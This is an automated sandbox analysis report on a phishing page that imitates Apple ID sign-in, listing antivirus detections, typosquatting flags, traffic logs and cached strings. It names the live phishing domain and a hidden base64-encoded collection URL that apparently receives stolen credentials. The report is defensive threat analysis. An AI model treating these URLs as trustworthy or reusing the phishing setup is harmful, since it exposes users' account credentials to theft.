Edit tour

Windows Analysis Report
https://www.flndmy.er-xu.com/aU3V88/c1.php

Overview

General Information

Sample URL:	https://www.flndmy.er-xu.com/aU3V88/c1.php
Analysis ID:	1589726
Infos:

Detection

Score:	64
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

AI detected suspicious URL

HTML page contains hidden URLs

Detected non-DNS traffic on DNS port

HTML page contains hidden javascript code

Classification

Process Tree

System is w10x64

chrome.exe (PID: 1020 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 6332 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 --field-trial-handle=2216,i,5822492874613631544,16240484877137270197,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 796 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.flndmy.er-xu.com/aU3V88/c1.php" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

cleanup

Malware Configuration

⊘No configs have been found

Yara Signatures

⊘No yara matches

Sigma Signatures

⊘No Sigma rule has matched

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: https://www.flndmy.er-xu.com/aU3V88/c1.php

Avira URL Cloud: detection malicious, Label: phishing

Antivirus detection for URL or domain

Source: https://www.flndmy.er-xu.com/aU3V88/css/myriad-set-pro_text.ttf	Avira URL Cloud: Label: phishing
Source: https://www.flndmy.er-xu.com/aU3V88/images/ajax-loader.gif	Avira URL Cloud: Label: phishing
Source: https://www.flndmy.er-xu.com/aU3V88/css/appe.css?v=1	Avira URL Cloud: Label: phishing
Source: https://www.flndmy.er-xu.com/aU3V88/jss/myscript_ind_fact.js	Avira URL Cloud: Label: phishing
Source: https://www.flndmy.er-xu.com/aU3V88/jss/function.js	Avira URL Cloud: Label: phishing
Source: https://www.flndmy.er-xu.com/favicon.ico	Avira URL Cloud: Label: phishing
Source: https://www.flndmy.er-xu.com/aU3V88/css/myriad-set-pro_thin.ttf	Avira URL Cloud: Label: phishing
Source: https://www.flndmy.er-xu.com/aU3V88/css/fonts2.css	Avira URL Cloud: Label: phishing
Source: https://www.flndmy.er-xu.com/aU3V88/jss/myscript_patron.js?v=2gdssf	Avira URL Cloud: Label: phishing
Source: https://www.flndmy.er-xu.com/aU3V88/css/myriad-set-pro_text.woff	Avira URL Cloud: Label: phishing
Source: https://www.flndmy.er-xu.com/aU3V88/css/myriad-set-pro_thin.woff	Avira URL Cloud: Label: phishing

Phishing

AI detected suspicious URL

Source: URL	Joe Sandbox AI: AI detected Brand spoofing attempt in URL: https://www.flndmy.er-xu.com
Source: URL	Joe Sandbox AI: AI detected Typosquatting in URL: https://www.flndmy.er-xu.com

HTML page contains hidden URLs

Source: https://www.flndmy.er-xu.com/aU3V88/c1.php

HTTP Parser: https://iserver88.pro/default/datos/

Source: https://www.flndmy.er-xu.com/aU3V88/c1.php

HTTP Parser: Base64 decoded: https://iserver88.pro/default/datos/

Source: https://www.flndmy.er-xu.com/aU3V88/c1.php

HTTP Parser: No favicon

Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:53512 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:53660 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:53714 version: TLS 1.2

Source: global traffic	TCP traffic: 192.168.2.6:53483 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.6:58528 -> 1.1.1.1:53

Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253

Source: global traffic	HTTP traffic detected: GET /aU3V88/c1.php HTTP/1.1Host: www.flndmy.er-xu.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /aU3V88/css/fonts2.css HTTP/1.1Host: www.flndmy.er-xu.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.flndmy.er-xu.com/aU3V88/c1.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /jquery-2.2.4.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.flndmy.er-xu.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /jquery-2.2.4.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /aU3V88/css/appe.css?v=1 HTTP/1.1Host: www.flndmy.er-xu.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.flndmy.er-xu.com/aU3V88/c1.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /aU3V88/jss/function.js HTTP/1.1Host: www.flndmy.er-xu.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.flndmy.er-xu.com/aU3V88/c1.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /aU3V88/jss/myscript_ind_fact.js HTTP/1.1Host: www.flndmy.er-xu.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.flndmy.er-xu.com/aU3V88/c1.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /aU3V88/jss/myscript_patron.js?v=2gdssf HTTP/1.1Host: www.flndmy.er-xu.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.flndmy.er-xu.com/aU3V88/c1.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /aU3V88/images/ajax-loader.gif HTTP/1.1Host: www.flndmy.er-xu.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.flndmy.er-xu.com/aU3V88/c1.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /aU3V88/jss/function.js HTTP/1.1Host: www.flndmy.er-xu.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /aU3V88/jss/myscript_ind_fact.js HTTP/1.1Host: www.flndmy.er-xu.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /aU3V88/images/ajax-loader.gif HTTP/1.1Host: www.flndmy.er-xu.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /aU3V88/css/myriad-set-pro_text.woff HTTP/1.1Host: www.flndmy.er-xu.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.flndmy.er-xu.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.flndmy.er-xu.com/aU3V88/css/fonts2.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /aU3V88/css/myriad-set-pro_thin.woff HTTP/1.1Host: www.flndmy.er-xu.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.flndmy.er-xu.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.flndmy.er-xu.com/aU3V88/css/fonts2.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /aU3V88/jss/myscript_patron.js?v=2gdssf HTTP/1.1Host: www.flndmy.er-xu.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /aU3V88/css/myriad-set-pro_thin.ttf HTTP/1.1Host: www.flndmy.er-xu.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.flndmy.er-xu.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.flndmy.er-xu.com/aU3V88/css/fonts2.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /aU3V88/css/myriad-set-pro_text.ttf HTTP/1.1Host: www.flndmy.er-xu.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.flndmy.er-xu.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.flndmy.er-xu.com/aU3V88/css/fonts2.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.flndmy.er-xu.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.flndmy.er-xu.com/aU3V88/c1.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: www.flndmy.er-xu.com
Source: global traffic	DNS traffic detected: DNS query: code.jquery.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 00:49:39 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 00:49:39 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 00:49:42 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 00:49:43 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 00:49:45 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1

Source: chromecache_130.3.dr, chromecache_116.3.dr	String found in binary or memory: http://bugs.jquery.com/ticket/12359
Source: chromecache_130.3.dr, chromecache_116.3.dr	String found in binary or memory: http://bugs.jquery.com/ticket/13378
Source: chromecache_130.3.dr, chromecache_116.3.dr	String found in binary or memory: http://dev.w3.org/csswg/cssom/#resolved-values
Source: chromecache_130.3.dr, chromecache_116.3.dr	String found in binary or memory: http://fluidproject.org/blog/2008/01/09/getting-setting-and-removing-tabindex-values-with-javascript
Source: chromecache_130.3.dr, chromecache_116.3.dr	String found in binary or memory: http://jquery.com/
Source: chromecache_130.3.dr, chromecache_116.3.dr	String found in binary or memory: http://jquery.org/license
Source: chromecache_130.3.dr, chromecache_116.3.dr	String found in binary or memory: http://jsperf.com/getall-vs-sizzle/2
Source: chromecache_130.3.dr, chromecache_116.3.dr	String found in binary or memory: http://jsperf.com/thor-indexof-vs-for/5
Source: chromecache_130.3.dr, chromecache_116.3.dr	String found in binary or memory: http://sizzlejs.com/
Source: chromecache_130.3.dr, chromecache_116.3.dr	String found in binary or memory: http://web.archive.org/web/20100324014747/http://blindsignals.com/index.php/2009/07/jquery-delay/
Source: chromecache_128.3.dr, chromecache_127.3.dr	String found in binary or memory: http://www.webtoolkit.info/
Source: chromecache_125.3.dr	String found in binary or memory: https://appleid.cdn-apple.com/appleauth/static/bin/cb1017220694/dist/assets/images/sms
Source: chromecache_125.3.dr	String found in binary or memory: https://appleid.cdn-apple.com/appleauth/static/bin/cb1938059335/dist/assets/images/virtualDevice
Source: chromecache_125.3.dr	String found in binary or memory: https://appleid.cdn-apple.com/appleauth/static/bin/cb1938059335/dist/assets/images/virtualDevice.png
Source: chromecache_125.3.dr	String found in binary or memory: https://appleid.cdn-apple.com/appleauth/static/bin/cb1998127860/dist/assets/images/sms.png
Source: chromecache_125.3.dr	String found in binary or memory: https://appleid.cdn-apple.com/appleauth/static/bin/cb2044472390/dist/assets/images/totp.png
Source: chromecache_125.3.dr	String found in binary or memory: https://appleid.cdn-apple.com/appleauth/static/bin/cb2613252489/dist/assets/images/sms
Source: chromecache_125.3.dr	String found in binary or memory: https://appleid.cdn-apple.com/appleauth/static/bin/cb2896941922/dist/assets/images/totp
Source: chromecache_125.3.dr	String found in binary or memory: https://appleid.cdn-apple.com/appleauth/static/bin/cb3200884379/dist/assets/images/totp
Source: chromecache_125.3.dr	String found in binary or memory: https://appleid.cdn-apple.com/appleauth/static/bin/cb3240912829/dist/assets/images/yellow-error.png
Source: chromecache_125.3.dr	String found in binary or memory: https://appleid.cdn-apple.com/appleauth/static/bin/cb3299837348/dist/assets/images/HR_gradient_dark.
Source: chromecache_125.3.dr	String found in binary or memory: https://appleid.cdn-apple.com/appleauth/static/bin/cb4257665051/dist/assets/images/HR_gradient_light
Source: chromecache_129.3.dr	String found in binary or memory: https://appleid.cdn-apple.com/appleauth/static/jsj/1577869377/widget/auth/app.js
Source: chromecache_129.3.dr	String found in binary or memory: https://appleid.cdn-apple.com/appleauth/static/jsj/N1241477586/common-header.js
Source: chromecache_125.3.dr	String found in binary or memory: https://appleid.cdn-apple.com/bin/cb259380101/dist/assets/generated-icons/shared-icons.woff
Source: chromecache_125.3.dr	String found in binary or memory: https://appleid.cdn-apple.com/bin/cb3176223654/dist/assets/generated-icons/shared-icons.eot
Source: chromecache_125.3.dr	String found in binary or memory: https://appleid.cdn-apple.com/bin/cb3176223654/dist/assets/generated-icons/shared-icons.eot?#iefix
Source: chromecache_125.3.dr	String found in binary or memory: https://appleid.cdn-apple.com/bin/cb3752583803/dist/assets/generated-icons/shared-icons.svg?#shared-
Source: chromecache_125.3.dr	String found in binary or memory: https://appleid.cdn-apple.com/bin/cb624250907/dist/assets/generated-icons/shared-icons.ttf
Source: chromecache_130.3.dr, chromecache_116.3.dr	String found in binary or memory: https://bugs.webkit.org/show_bug.cgi?id=136851
Source: chromecache_130.3.dr, chromecache_116.3.dr	String found in binary or memory: https://bugs.webkit.org/show_bug.cgi?id=29084
Source: chromecache_130.3.dr, chromecache_116.3.dr	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=491668
Source: chromecache_130.3.dr, chromecache_116.3.dr	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=649285
Source: chromecache_130.3.dr, chromecache_116.3.dr	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=687787
Source: chromecache_130.3.dr, chromecache_116.3.dr	String found in binary or memory: https://code.google.com/p/chromium/issues/detail?id=229280
Source: chromecache_130.3.dr, chromecache_116.3.dr	String found in binary or memory: https://code.google.com/p/chromium/issues/detail?id=378607
Source: chromecache_130.3.dr, chromecache_116.3.dr	String found in binary or memory: https://code.google.com/p/chromium/issues/detail?id=449857
Source: chromecache_130.3.dr, chromecache_116.3.dr	String found in binary or memory: https://code.google.com/p/chromium/issues/detail?id=470258
Source: chromecache_129.3.dr	String found in binary or memory: https://code.jquery.com/jquery-2.2.4.js
Source: chromecache_130.3.dr, chromecache_116.3.dr	String found in binary or memory: https://developer.mozilla.org/en-US/docs/CSS/display
Source: chromecache_130.3.dr, chromecache_116.3.dr	String found in binary or memory: https://github.com/jquery/jquery/pull/557)
Source: chromecache_130.3.dr, chromecache_116.3.dr	String found in binary or memory: https://github.com/jquery/jquery/pull/764
Source: chromecache_130.3.dr, chromecache_116.3.dr	String found in binary or memory: https://github.com/jquery/sizzle/pull/225
Source: chromecache_130.3.dr, chromecache_116.3.dr	String found in binary or memory: https://github.com/jrburke/requirejs/wiki/Updating-existing-libraries#wiki-anon
Source: chromecache_130.3.dr, chromecache_116.3.dr	String found in binary or memory: https://html.spec.whatwg.org/#strip-and-collapse-whitespace
Source: chromecache_117.3.dr	String found in binary or memory: https://idmsa.apple.com/IDMSWebAuth/signin?appIdKey=6f59402f11d3e2234be5b88bf1c96e1e453a875aec205272
Source: chromecache_129.3.dr	String found in binary or memory: https://iforgot.apple.com/password/verify/appleid?returnURL=https%3A%2F%2Fidmsa.apple.com%2Fsignin%3

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53605
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53604
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53566 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53609
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53608
Source: unknown	Network traffic detected: HTTP traffic on port 53600 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53607
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53565
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53604 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53572 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53627 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53568
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53567
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53600
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53566
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53495
Source: unknown	Network traffic detected: HTTP traffic on port 53496 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53572
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53570
Source: unknown	Network traffic detected: HTTP traffic on port 53582 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53567 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53496
Source: unknown	Network traffic detected: HTTP traffic on port 53607 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53654
Source: unknown	Network traffic detected: HTTP traffic on port 53608 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53660
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53582
Source: unknown	Network traffic detected: HTTP traffic on port 53713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53568 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53627
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53626
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53570 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53512 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53660 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53609 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53714
Source: unknown	Network traffic detected: HTTP traffic on port 53565 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53713
